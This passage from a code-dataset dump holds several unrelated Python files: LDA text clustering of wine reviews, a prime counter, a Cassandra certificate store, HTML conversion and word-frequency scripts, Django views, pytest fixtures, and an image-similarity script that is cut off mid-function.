Chris Berardi\r\nSolution to STAT656 Week 10 Assigment, Spring 2017\r\nBasic Text Clustering\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport string\r\nimport nltk\r\nimport numpy as np\r\nfrom nltk import pos_tag\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem.snowball import SnowballStemmer\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import wordnet as wn\r\nfrom nltk.corpus import stopwords\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\n#for regression\r\nfrom Class_replace_impute_encode import ReplaceImputeEncode\r\nfrom Class_regression import linreg\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# my_analyzer replaces both the preprocessor and tokenizer\r\n# it also replaces stop word removal and ngram constructions\r\n\r\ndef my_analyzer(s):\r\n # Synonym List\r\n syns = {'veh': 'vehicle', 'car': 'vehicle', 'chev':'cheverolet', \\\r\n 'chevy':'cheverolet', 'air bag': 'airbag', \\\r\n 'seat belt':'seatbelt', \"n't\":'not', 'to30':'to 30', \\\r\n 'wont':'would not', 'cant':'can not', 'cannot':'can not', \\\r\n 'couldnt':'could not', 'shouldnt':'should not', \\\r\n 'wouldnt':'would not', }\r\n \r\n # Preprocess String s\r\n s = s.lower()\r\n s = s.replace(',', '. ')\r\n # Tokenize \r\n tokens = word_tokenize(s)\r\n tokens = [word.replace(',','') for word in tokens ]\r\n tokens = [word for word in tokens if ('*' not in word) and \\\r\n (\"''\" != word) and (\"``\" != word) and \\\r\n (word!='description') and (word !='dtype') \\\r\n and (word != 'object') and (word!=\"'s\")]\r\n \r\n # Map synonyms\r\n for i in range(len(tokens)):\r\n if tokens[i] in syns:\r\n tokens[i] = syns[tokens[i]]\r\n \r\n # Remove stop words\r\n punctuation = list(string.punctuation)+['..', '...']\r\n pronouns = ['i', 'he', 'she', 'it', 'him', 'they', 'we', 'us', 'them']\r\n stop = stopwords.words('english') + punctuation + pronouns\r\n filtered_terms = [word for word in tokens if (word not in stop) and \\\r\n (len(word)>1) and (not word.replace('.','',1).isnumeric()) \\\r\n and (not word.replace(\"'\",'',2).isnumeric())]\r\n \r\n # Lemmatization & Stemming - Stemming with WordNet POS\r\n # Since lemmatization requires POS need to set POS\r\n tagged_words = pos_tag(filtered_terms, lang='eng')\r\n # Stemming with for terms without WordNet POS\r\n stemmer = SnowballStemmer(\"english\")\r\n wn_tags = {'N':wn.NOUN, 'J':wn.ADJ, 'V':wn.VERB, 'R':wn.ADV}\r\n wnl = WordNetLemmatizer()\r\n stemmed_tokens = []\r\n for tagged_token in tagged_words:\r\n term = tagged_token[0]\r\n pos = tagged_token[1]\r\n pos = pos[0]\r\n try:\r\n pos = wn_tags[pos]\r\n stemmed_tokens.append(wnl.lemmatize(term, pos=pos))\r\n except:\r\n stemmed_tokens.append(stemmer.stem(term))\r\n return stemmed_tokens\r\n\r\n# Further Customization of Stopping and Stemming using NLTK\r\ndef my_preprocessor(s):\r\n #Vectorizer sends one string at a time\r\n s = s.lower()\r\n s = s.replace(',', '. ')\r\n print(\"preprocessor\")\r\n return(s)\r\n \r\ndef my_tokenizer(s):\r\n # Tokenize\r\n print(\"Tokenizer\")\r\n tokens = word_tokenize(s)\r\n tokens = [word.replace(',','') for word in tokens ]\r\n tokens = [word for word in tokens if word.find('*')!=True and \\\r\n word != \"''\" and word !=\"``\" and word!='description' \\\r\n and word !='dtype']\r\n return tokens\r\n\r\n# Increase Pandas column width to let pandas read large text columns\r\npd.set_option('max_colwidth', 32000)\r\n# California Cabernet Reviews\r\nfile_path = 'C:/Users/Saistout/Desktop/656 Applied Analytics/Python/Week 10 Assignment/'\r\ndf = pd.read_excel(file_path+\"CaliforniaCabernet.xlsx\")\r\n\r\n# Setup simple constants\r\nn_docs = len(df['description'])\r\nn_samples = n_docs\r\nm_features = None\r\ns_words = 'english'\r\nngram = (1,2)\r\n\r\n# Setup reviews in list 'discussions'\r\ndiscussions = []\r\nfor i in range(n_samples):\r\n discussions.append((\"%s\" %df['description'].iloc[i]))\r\n \r\n \r\n# Create Word Frequency by Review Matrix using Custom Analyzer\r\ncv = CountVectorizer(max_df=0.95, min_df=2, max_features=m_features,\\\r\n analyzer=my_analyzer, ngram_range=ngram)\r\ntf = cv.fit_transform(discussions)\r\n\r\nprint(\"\\nVectorizer Parameters\\n\", cv, \"\\n\")\r\n\r\n\r\n# LDA For Term Frequency x Doc Matrix\r\nn_topics = 9\r\nmax_iter = 5\r\nlearning_offset = 20.\r\nlearning_method = 'online'\r\n# LDA for TF-IDF x Doc Matrix\r\n# First Create Term-Frequency/Inverse Doc Frequency by Review Matrix\r\n# This requires constructing Term Freq. x Doc. matrix first\r\ntf_idf = TfidfTransformer()\r\nprint(\"\\nTF-IDF Parameters\\n\", tf_idf.get_params(),\"\\n\")\r\ntf_idf = tf_idf.fit_transform(tf)\r\n# Or you can construct the TF/IDF matrix from the data\r\ntfidf_vect = TfidfVectorizer(max_df=0.95, min_df=2, max_features=m_features,\\\r\n analyzer=my_analyzer, ngram_range=ngram)\r\ntf_idf = tfidf_vect.fit_transform(discussions)\r\nprint(\"\\nTF_IDF Vectorizer Parameters\\n\", tfidf_vect, \"\\n\")\r\n\r\nlda = LatentDirichletAllocation(n_components=n_topics, max_iter=max_iter,\\\r\n learning_method=learning_method, \\\r\n learning_offset=learning_offset, \\\r\n random_state=12345)\r\nlda.fit_transform(tf_idf)\r\nprint('{:.<22s}{:>6d}'.format(\"Number of Reviews\", tf.shape[0]))\r\nprint('{:.<22s}{:>6d}'.format(\"Number of Terms\", tf.shape[1]))\r\nprint(\"\\nTopics Identified using LDA with TF_IDF\")\r\ntf_features = cv.get_feature_names()\r\nmax_words = 15\r\ndesc = []\r\nfor topic_idx, topic in enumerate(lda.components_):\r\n message = \"Topic #%d: \" % topic_idx\r\n message += \" \".join([tf_features[i]\r\n for i in topic.argsort()[:-max_words - 1:-1]])\r\n print(message)\r\n print()\r\n desc.append([tf_features[i] for i in topic.argsort()[:-max_words - 1:-1]])\r\n \r\n#Extract which topic each review belongs to\r\ntopics = pd.DataFrame(lda.fit_transform(tf_idf))\r\nclusters = pd.DataFrame(topics.idxmax(axis=1))\r\ncol=['year','points','Region','price']\r\nclus = pd.concat([clusters,df[col]], axis=1, ignore_index=True)\r\n#rename the columns\r\nclus.columns = [\"Cluster\",\"Year\",\"Score\",\"Region\",\"Price\"]\r\n\r\n#Create a table of the average points and price per cluster, include the 15\r\n#word descriptions in the table\r\nprice = []\r\nscore = []\r\ncluster = []\r\nmean_table=pd.DataFrame()\r\nfor i in range(0,9):\r\n this_clust = clus[clus['Cluster']==i]\r\n this_price = this_clust['Price'].mean()\r\n this_score = this_clust['Score'].mean()\r\n price.append(this_price)\r\n score.append(this_score)\r\n cluster.append(i)\r\nmean_table['Cluster']=cluster\r\nmean_table['Score']=score\r\nmean_table['Price']=price\r\nmean_table['Description']=desc\r\nmean_table\r\n\r\n#Create a table of the percent of reviews in each cluster by wine region\r\np0=[]\r\np1=[]\r\np2=[]\r\np3=[]\r\np4=[]\r\np5=[]\r\np6=[]\r\np7=[]\r\np8=[]\r\nregions=['California Other', 'Central Coast','Central Valley', 'Clear Lake',\\\r\n 'High Valley', 'Lake County','Mendocino County','Mendocino Ridge',\\\r\n 'Mendocino/Lake Counties', 'Napa','Napa-Sonoma','North Coast',\\\r\n 'Red Hills Lake County','Redwood Valley','Sierra Foothills','Sonoma',\\\r\n 'South Coast']\r\npRegion=pd.DataFrame()\r\nfor name in regions:\r\n this_region = clus[clus['Region']==name]\r\n n=[]\r\n total=0\r\n for i in range(0,9):\r\n this_clus=this_region[this_region['Cluster']==i]\r\n n.append(this_clus.shape[0])\r\n total=sum(n)\r\n p0.append(n[0]/total)\r\n p1.append(n[1]/total)\r\n p2.append(n[2]/total)\r\n p3.append(n[3]/total)\r\n p4.append(n[4]/total)\r\n p5.append(n[5]/total)\r\n p6.append(n[6]/total)\r\n p7.append(n[7]/total)\r\n p8.append(n[8]/total)\r\npRegion['Region']=regions\r\npRegion['P0']=p0\r\npRegion['P1']=p1\r\npRegion['P2']=p2\r\npRegion['P3']=p3\r\npRegion['P4']=p4\r\npRegion['P5']=p5\r\npRegion['P6']=p6\r\npRegion['P7']=p7\r\npRegion['P8']=p8\r\n\r\n#Fit a linear regression model to model wine price use a 70/30 train test split\r\n#Since the regularization parameter C only exists for logistic regression\r\nattribute_map_clus = {\r\n 'Score' :[0,(80,100),[0,0]],\r\n 'Year' :[0,(1985,2016),[0,0]],\r\n 'Region' :[2,('California Other', 'Central Coast','Central Valley', \\\r\n 'Clear Lake','High Valley', 'Lake County',\\\r\n 'Mendocino County','Mendocino Ridge',\\\r\n 'Mendocino/Lake Counties', 'Napa','Napa-Sonoma',\\\r\n 'North Coast','Red Hills Lake County','Redwood Valley',\\\r\n 'Sierra Foothills','Sonoma','South Coast'),[0,0]],\r\n 'Cluster' :[2,(0,1,2,3,4,5,6,7,8),[0,0]],\r\n 'Price' :[0,(0,625),[0,0]]\r\n}\r\nvarlist = ['Price']\r\n\r\nrie_clus = ReplaceImputeEncode(data_map=attribute_map_clus, \\\r\n nominal_encoding='one-hot', \r\n interval_scale = None, drop=True, display=False)\r\nencoded_df_clus = rie_clus.fit_transform(clus)\r\n\r\nX_clus = encoded_df_clus.drop(varlist, axis=1)\r\ny_clus = encoded_df_clus[varlist]\r\nX_train, X_valid, y_train, y_valid= \\\r\ntrain_test_split(X_clus,y_clus,test_size = 0.3, random_state=7)\r\n\r\nnp_y_train = np.ravel(y_train)\r\nnp_y_valid = np.ravel(y_valid)\r\n\r\n\r\nreg = LinearRegression()\r\nreg.fit(X_train,np_y_train)\r\n\r\nlinreg.display_coef(reg,X_train,y_train,X_train.columns)\r\nlinreg.display_split_metrics(reg,X_train,y_train,X_valid,y_valid)","sub_path":"week 10.py","file_name":"week 10.py","file_ext":"py","file_size_in_byte":9778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217401870","text":"def solve(A):\n count=0\n for i in range(len(A)):\n if A[i]&1==1 and A[i]>1 and A[i]!=2:\n j=3\n isPrime=True\n while(j*j<=A[i]):\n if A[i]%j==0:\n isPrime=False\n break\n else:\n j+=1\n if isPrime==True:\n #print(A[i])\n count+=1\n elif A[i] in [2,3,5,7]:\n count+=1\n return count\n \n \ndef main():\n A=list(map(int,input().split()))\n n=solve(A)\n print(n)\n\nif __name__ == '__main__':\n main()\n","sub_path":"primeCount.py","file_name":"primeCount.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"95213073","text":"# Copyright (c) 2016 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\n\nfrom cassandra import query\nfrom oslo_log import log\nfrom six.moves import filterfalse\n\nfrom poppy.model import ssl_certificate\nfrom poppy.storage import base\n\n\nLOG = log.getLogger(__name__)\n\nCQL_CREATE_CERT = '''\n INSERT INTO certificate_info (project_id,\n flavor_id,\n cert_type,\n domain_name,\n cert_details\n )\n VALUES (%(project_id)s,\n %(flavor_id)s,\n %(cert_type)s,\n %(domain_name)s,\n %(cert_details)s)\n'''\n\nCQL_SEARCH_CERT_BY_DOMAIN = '''\n SELECT project_id,\n flavor_id,\n cert_type,\n domain_name,\n cert_details\n FROM certificate_info\n WHERE domain_name = %(domain_name)s\n'''\n\nCQL_GET_CERTS_BY_STATUS = '''\n SELECT domain_name\n FROM cert_status WHERE status = %(status)s\n'''\n\nCQL_DELETE_CERT = '''\n DELETE FROM certificate_info\n WHERE domain_name = %(domain_name)s\n'''\n\nCQL_DELETE_CERT_STATUS = '''\n DELETE FROM cert_status\n WHERE domain_name = %(domain_name)s\n'''\n\n\nCQL_INSERT_CERT_STATUS = '''\n INSERT INTO cert_status (domain_name,\n status\n )\n VALUES (%(domain_name)s,\n %(status)s)\n'''\n\nCQL_UPDATE_CERT_DETAILS = '''\n UPDATE certificate_info\n set cert_details = %(cert_details)s\n WHERE domain_name = %(domain_name)s\n IF cert_type = %(cert_type)s AND flavor_id = %(flavor_id)s\n'''\n\n\nclass CertificatesController(base.CertificatesController):\n\n \"\"\"Certificates Controller.\"\"\"\n\n @property\n def session(self):\n \"\"\"Get session.\n\n :returns session\n \"\"\"\n return self._driver.database\n\n def create_certificate(self, project_id, cert_obj):\n if self.cert_already_exist(domain_name=cert_obj.domain_name,\n comparing_cert_type=cert_obj.cert_type,\n comparing_flavor_id=cert_obj.flavor_id,\n comparing_project_id=project_id):\n raise ValueError('Certificate already exists '\n 'for {0} '.format(cert_obj.domain_name))\n\n args = {\n 'project_id': project_id,\n 'flavor_id': cert_obj.flavor_id,\n 'cert_type': cert_obj.cert_type,\n 'domain_name': cert_obj.domain_name,\n # when create the cert, cert domain has not been assigned yet\n # In future we can tweak the logic to assign cert_domain\n # 'cert_domain': '',\n 'cert_details': cert_obj.cert_details\n }\n stmt = query.SimpleStatement(\n CQL_CREATE_CERT,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n\n cert_status = None\n try:\n provider_status = json.loads(\n list(cert_obj.cert_details.values())[0]\n )\n cert_status = provider_status['extra_info']['status']\n except (IndexError, KeyError, ValueError) as e:\n LOG.warning(\n \"Create certificate missing extra info \"\n \"status {0}: Error {1}. \"\n \"Using 'create_in_progress' instead. \".format(\n cert_obj.cert_details, e))\n cert_status = 'create_in_progress'\n finally:\n # insert/update for cassandra\n self.insert_cert_status(cert_obj.domain_name, cert_status)\n\n def delete_certificate(self, project_id, domain_name, cert_type):\n args = {\n 'domain_name': domain_name.lower()\n }\n\n stmt = query.SimpleStatement(\n CQL_SEARCH_CERT_BY_DOMAIN,\n consistency_level=self._driver.consistency_level)\n result_set = self.session.execute(stmt, args)\n complete_results = list(result_set)\n if complete_results:\n for r in complete_results:\n r_project_id = str(r.get('project_id'))\n r_cert_type = str(r.get('cert_type'))\n if r_project_id == str(project_id) and \\\n r_cert_type == str(cert_type):\n args = {\n 'domain_name': str(r.get('domain_name'))\n }\n stmt = query.SimpleStatement(\n CQL_DELETE_CERT,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n stmt = query.SimpleStatement(\n CQL_DELETE_CERT_STATUS,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n else:\n raise ValueError(\n \"No certificate found for: {0},\"\n \"type: {1}\".format(domain_name, cert_type))\n\n def update_certificate(self, domain_name, cert_type, flavor_id,\n cert_details):\n\n args = {\n 'domain_name': domain_name,\n 'cert_type': cert_type,\n 'flavor_id': flavor_id,\n 'cert_details': cert_details\n }\n stmt = query.SimpleStatement(\n CQL_UPDATE_CERT_DETAILS,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, args)\n\n try:\n provider_status = json.loads(list(cert_details.values())[0])\n cert_status = provider_status['extra_info']['status']\n self.insert_cert_status(domain_name, cert_status)\n except (IndexError, KeyError, ValueError) as e:\n # certs already existing in DB should have all\n # the necessary fields\n LOG.error(\n \"Unable to update cert_status because certificate \"\n \"details are in an inconsistent \"\n \"state: {0}: {1}\".format(cert_details, e))\n\n def insert_cert_status(self, domain_name, cert_status):\n cert_args = {\n 'domain_name': domain_name,\n 'status': cert_status\n }\n stmt = query.SimpleStatement(\n CQL_INSERT_CERT_STATUS,\n consistency_level=self._driver.consistency_level)\n self.session.execute(stmt, cert_args)\n\n def get_certs_by_status(self, status):\n\n LOG.info(\"Getting domains which have \"\n \"certificate in status : {0}\".format(status))\n args = {\n 'status': status\n }\n stmt = query.SimpleStatement(\n CQL_GET_CERTS_BY_STATUS,\n consistency_level=self._driver.consistency_level)\n resultset = self.session.execute(stmt, args)\n complete_results = list(resultset)\n\n return complete_results\n\n def get_certs_by_domain(self, domain_name, project_id=None,\n flavor_id=None,\n cert_type=None):\n\n LOG.info(\"Check if cert on '{0}' exists\".format(domain_name))\n args = {\n 'domain_name': domain_name.lower()\n }\n stmt = query.SimpleStatement(\n CQL_SEARCH_CERT_BY_DOMAIN,\n consistency_level=self._driver.consistency_level)\n resultset = self.session.execute(stmt, args)\n complete_results = list(resultset)\n certs = []\n if complete_results:\n for r in complete_results:\n r_project_id = str(r.get('project_id'))\n r_flavor_id = str(r.get('flavor_id'))\n r_cert_type = str(r.get('cert_type'))\n r_cert_details = {}\n # in case cert_details is None\n cert_details = r.get('cert_details', {}) or {}\n # Need to convert cassandra dict into real dict\n # And the value of cert_details is a string dict\n for key in cert_details:\n r_cert_details[key] = json.loads(cert_details[key])\n LOG.info(\n \"Certificate for domain: {0} with flavor_id: {1}, \"\n \"cert_details : {2} and cert_type: {3} present \"\n \"on project_id: {4}\".format(\n domain_name,\n r_flavor_id,\n r_cert_details,\n r_cert_type,\n r_project_id\n )\n )\n ssl_cert = ssl_certificate.SSLCertificate(\n domain_name=domain_name,\n flavor_id=r_flavor_id,\n cert_details=r_cert_details,\n cert_type=r_cert_type,\n project_id=r_project_id\n )\n\n certs.append(ssl_cert)\n\n non_none_attrs_gen = filterfalse(\n lambda x: list(x.values())[0] is None, [{'project_id': project_id},\n {'flavor_id': flavor_id},\n {'cert_type': cert_type}])\n non_none_attrs_list = list(non_none_attrs_gen)\n non_none_attrs_dict = {}\n\n if non_none_attrs_list:\n for attr in non_none_attrs_list:\n non_none_attrs_dict.update(attr)\n\n def argfilter(certificate):\n all_conditions = True\n if non_none_attrs_dict:\n for k, v in non_none_attrs_dict.items():\n if getattr(certificate, k) != v:\n all_conditions = False\n\n return all_conditions\n\n total_certs = [cert for cert in certs if argfilter(cert)]\n\n if len(total_certs) == 1:\n return total_certs[0]\n else:\n return total_certs\n\n def cert_already_exist(self, domain_name, comparing_cert_type,\n comparing_flavor_id, comparing_project_id):\n \"\"\"cert_already_exist\n\n Check if a cert with this domain name and type has already been\n created, or if the domain has been taken by other customers\n\n :param domain_name\n :param comparing_cert_type\n :param comparing_flavor_id\n :param comparing_project_id\n\n :returns Boolean if the cert with same type exists with another user.\n \"\"\"\n cert = self.get_certs_by_domain(\n domain_name=domain_name,\n cert_type=comparing_cert_type,\n flavor_id=comparing_flavor_id\n )\n\n if cert:\n return True\n else:\n return False\n","sub_path":"poppy/storage/cassandra/certificates.py","file_name":"certificates.py","file_ext":"py","file_size_in_byte":10945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181705252","text":"#!/usr/bin/python\nimport sys\nfrom bs4 import BeautifulSoup\n\nalpha = \"abcdefghijklmnopqrstwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nd={'Introduction':'1','Theory':'2','Objective':'3','Virtual Lab':'4','Manual':'5','Quiz':'6','Video':'7','Reference':'8'}\nfile_read = raw_input(\"Enter the name of the source file: \")\nsoup = BeautifulSoup(open(file_read))\ndiv = ''\nfile_name = ''\nflag = 0\nexp = ''\nbl = 0\nfor i in soup.title.string:\n\t\n\tif ((i == \":\") or (i == \")\")):\n\t\tbreak\n\n\tif( i in alpha and (bl == 0)):\n\t\tbl = 1 \n\tif(bl==1):\n\t\n\t\tfile_name += i\n\n\t\tif i == \"(\":\n\t\t\tflag = 1\n\t\t\tcontinue\n\t\n\t\tif flag == 0:\n\t\t\texp += i\n\n\t\tif flag == 1:\n\t\t\tdiv += i\n\n#fo = open(file_name+\").txt\", \"w\")\n#print \"Name of the file: \", fo.name\n#fo.write(\"Title\"app+\"\\n\");\n\nfile_w = raw_input(\"Enter the name of the destination file: \")\nf = open(file_w,\"r\")\nf_content = f.read()\nf.close()\n\nso = BeautifulSoup(f_content)\n\t\natt = ''+'experiment-article-section-'+d[div]+'-content'\n\ntagger = so.findAll('div', attrs={'id':att,'class':'content'})\ntag = tagger[0]\ntag.clear() \n\nexp_name = so.findAll('header', attrs={'class':'heading','id':'experiment-article-heading'})\nexp_n = exp_name[0]\nexp_n.clear()\nexp_n.insert(1,exp)\nif (d[div]=='4' or d[div]=='7'):\n\tcont = soup.findAll('div', attrs={'class': 'divLink'})\nelse:\n\tcont = soup.findAll('div', attrs={'class': 'divContent'})\ntag.insert(1,cont[0])\n\nf = open(file_w,\"w\")\nf.write(str(so))\nf.close()\n#fo.close()\n#-----------Created by----------------------#\n#-----Pranitha and Sourav-------------------#\n#-----------Conversion of html files to new UI(blue icon theme) format------#\n","sub_path":"lik-release-0.5.0/ui-1.0-toolkit/scripts/automated-scripts/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"505903840","text":"import pytest\n\n\n@pytest.yield_fixture()\ndef setup():\n print('Running before every Test')\n yield\n print('Running after every Test')\n\n\n@pytest.yield_fixture(scope='class')\ndef one_time_setup(browser, os_type,request):\n print('Running Once before all Tests')\n if browser == 'firefox':\n print('Running Firefox Browser')\n value = 10\n elif browser == 'Chrome':\n print('Running Chrome Browser')\n value = 20\n if request.cls is not None:\n request.cls.value = value\n yield value\n print('Running Once after all Tests')\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\")\n parser.addoption(\"--osType\", help=\"Please specify os Type\")\n\n\n@pytest.fixture(scope=\"session\")\ndef browser(request):\n return request.config.getoption(\"--browser\")\n\n\n@pytest.fixture(scope=\"session\")\ndef os_type(request):\n return request.config.getoption(\"--osType\")\n\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"341185819","text":"#!/usr/bin/env python\n\"\"\" Frequent Words extractor [Productivity Tool]\nScan the given directory, list all the words appear in certain type of files\nGenerator a list of that words\nMainly for vim completion\n@Author: Zhifeng(fengyu05@gmail.com)\n\"\"\"\n\nusage = \"usage: %prog [--min_length=5] [--min_fre=5] filetype directory\"\n\nimport sys\nimport re\nfrom optparse import OptionParser\nfrom os import listdir\nfrom os.path import isdir,islink,join\n\nparser = OptionParser(usage)\nparser.add_option(\"-l\", \"--min_length\", dest=\"MIN_LENGTH\",\n type=\"int\",\n default = 7,\n help=\"min length that concerns\")\n\nparser.add_option(\"-f\", \"--min_freq\", dest=\"MIN_FREQUENT\",\n type=\"int\",\n default = 7,\n help=\"min frequent that concerns\")\n\nparser.add_option(\"-d\", \"--max_deep\", dest=\"MAX_DEEP\",\n type=\"int\",\n default = 20,\n help=\"max deep of directory\")\n\nwordDict = dict()\n\ndef checkWords(filetype, directory, options, deep):\n if deep > options.MAX_DEEP:\n return\n for file in listdir(directory):\n fileFullPath = join(directory, file)\n if isdir(fileFullPath) and not islink(fileFullPath):\n checkWords(filetype, fileFullPath, options, deep + 1)\n else:\n if fileFullPath.endswith(\".\" + filetype):\n content = open(fileFullPath, \"r\").readlines()\n for line in content:\n words = re.split('\\W+', line)\n for word in words:\n if len(word) >= options.MIN_LENGTH:\n if word in wordDict:\n wordDict[word] = wordDict[word] + 1\n else:\n wordDict[word] = 1\n\ndef genWords(options):\n freqWords = [word for word, frequent in wordDict.iteritems() \n if frequent >= options.MIN_FREQUENT]\n for word in freqWords:\n print (word)\n\ndef main():\n (options, argv) = parser.parse_args()\n if len(argv) < 2:\n parser.error(\"incorrect number of arguments\")\n sys.exit(1)\n filetype = argv[0]\n directory = argv[1]\n checkWords(filetype, directory, options, 0)\n genWords(options)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"utt/freqword_extractor.py","file_name":"freqword_extractor.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"454552729","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom listings.models import Listing\nfrom realtors.models import Realtor\n\ndef index(request):\n listings=Listing.objects.order_by('list_date').filter(is_published=True)[:3]\n context = {\n 'listings':listings\n }\n return render(request,'pages/index.html', context)\n\n\ndef about(request):\n\n realtors=Realtor.objects.order_by('-hire_date')\n mpv_realtor=Realtor.objects.all().filter(is_mvp=True)\n context={\n 'realtors':realtors,\n 'mpv_realtor': mpv_realtor\n }\n \n return render(request,'pages/about.html', context)\n\n\n","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9844837","text":"import cv2, enum, time, os, math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import rankdata\n\n#############################################################################\n# User variables (static)\n#############################################################################\nclass PltFunc :\n def plot1row2Img(img1, img2):\n fig = plt.figure()\n fig.add_subplot(1,2,1)\n plt.imshow(img1)\n fig.add_subplot(1,2,2)\n plt.imshow(img2)\n plt.show() \n\nclass ALG(enum.Enum):\n MAE = 0\n MSE = 1\n RMSE = 2\n PSNR = 3\n SSIM = 4\n P_MSE = 5 \n \nclass ImgCompare :\n def cvt256gray(img) :\n img = cv2.resize(img, (256,256), interpolation=cv2.INTER_LINEAR )\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return img\n \n def mae(img1, img2):\n img1 = ImgCompare.cvt256gray(img1)\n img2 = ImgCompare.cvt256gray(img2)\n err = np.sum(abs((img1.astype(\"float\") - img2.astype(\"float\"))))\n err /= float(img1.shape[0] * img1.shape[1])\n return err\n\n def mse(img1, img2):\n img1 = ImgCompare.cvt256gray(img1)\n img2 = ImgCompare.cvt256gray(img2)\n err = np.sum((img1.astype(\"float\") - img2.astype(\"float\")) ** 2)\n err /= float(img1.shape[0] * img1.shape[1])\n return err\n\n def p_mse(img1, img2):\n img1 = ImgCompare.cvt256gray(img1)\n img2 = ImgCompare.cvt256gray(img2)\n maxval = np.max((img1.astype(\"float\") - img2.astype(\"float\")) ** 2)\n err = np.sum((img1.astype(\"float\") - img2.astype(\"float\")) ** 2)\n err /= float(img1.shape[0] * img1.shape[1])\n return err/maxval\n\n def rmse(img1, img2):\n err = ImgCompare.mse(img1, img2)\n return math.sqrt(err)\n\n def psnr(img1, img2):\n _rmse = ImgCompare.rmse(img1,img2)\n if _rmse == 0:\n return 100\n PIXEL_MAX = 255.0\n return 20 * math.log10(PIXEL_MAX / _rmse)\n\n def percent_ssim(img1, img2) :\n from skimage.measure import compare_ssim as ssim\n #img1 = cv2.resize(img1, (256,256), interpolation=cv2.INTER_LINEAR )\n #img2 = cv2.resize(img2, (256,256), interpolation=cv2.INTER_LINEAR )\n s = ssim(img1,img2, multichannel = True)\n return s\n\nclass ViewGuide :\n def mainLoop(rBase, tImgPath) :\n start = time.time()\n tempPath = rBase\n rImageList = os.listdir(tempPath)\n rImageList.sort()\n #print(tempPath+rImageList[0])\n tImg = cv2.imread(tImgPath)\n #plt.imshow(tImg)\n #plt.show()\n tImg = cv2.resize(tImg, (256,256), interpolation=cv2.INTER_LINEAR )\n tImg = cv2.cvtColor(tImg, cv2.COLOR_BGR2RGB)\n rImgs = []\n ssimArr = []\n psnrArr = []\n pmseArr = []\n \n votingArr = [[1,3,9],[0,4,2,10],[1,5,11],[0,4,6,12],[1,3,5,7],[2,4,8,13],[3,7,14],[4,6,8,15],[5,7,16],[0,10,12,17],[1,9,11,18],[2,10,13,19],[3,9,14,20],[5,11,16,22],[6,12,15,23],[7,14,16,24],[8,13,15,25],[9,18,20],[10,17,19,21],[11,18,22],[12,17,21,23],[18,20,22,24],[13,19,21,25],[14,20,24],[15,21,23,25],[16,22,24]]\n \n for filename in rImageList :\n rImg = cv2.imread(tempPath+filename)\n plt.imshow(rImg)\n plt.show()\n rImg = rImg[150:1200, 300:1600]\n rImg = cv2.resize(rImg, (256,256), interpolation=cv2.INTER_LINEAR )\n rImg = cv2.cvtColor(rImg, cv2.COLOR_BGR2RGB)\n rImgs.append(rImg)\n #PltFunc.plot1row2Img(rImg, tImg)\n ssim = ImgCompare.percent_ssim(rImg, tImg)\n psnr = ImgCompare.psnr(rImg, tImg)\n pmse = ImgCompare.p_mse(rImg, tImg)\n #print(filename)\n #print( \"ssim : %.2f , psnr : %.2f, pmse : %.2f\" %(ssim*100.0, psnr,pmse*100.0) )\n \n ssimArr.append(ssim)\n psnrArr.append(psnr)\n pmseArr.append(pmse)\n \n \n print(\"calc Total time : \", (time.time() - start), 'sec')\n print(ssimArr)\n \n ssimRank = rankdata(ssimArr)\n psnrRank = rankdata(psnrArr)\n pmseRank = rankdata(pmseArr)\n votingArrSSIM = [0 for _ in range(26)]\n votingArrPSNR = [0 for _ in range(26)]\n votingArrPMSE = [0 for _ in range(26)]\n votingArrSum = [0 for _ in range(26)]\n \n for i in range(len(ssimRank)) :\n votingArrSSIM[i] += (ssimRank[i]-1)\n votingArrPSNR[i] += (psnrRank[i]-1)\n votingArrPMSE[i] += (pmseRank[i]-1)\n \n for j in votingArr[i] :\n votingArrSSIM[j] += (ssimRank[i]-1)/2\n votingArrPSNR[j] += (psnrRank[i]-1)/2\n votingArrPMSE[j] += (pmseRank[i]-1)/2\n \n for i in range(len(votingArrSSIM)) :\n votingArrSum[i]+=votingArrSSIM[i]\n votingArrSum[i]+=votingArrPSNR[i]\n 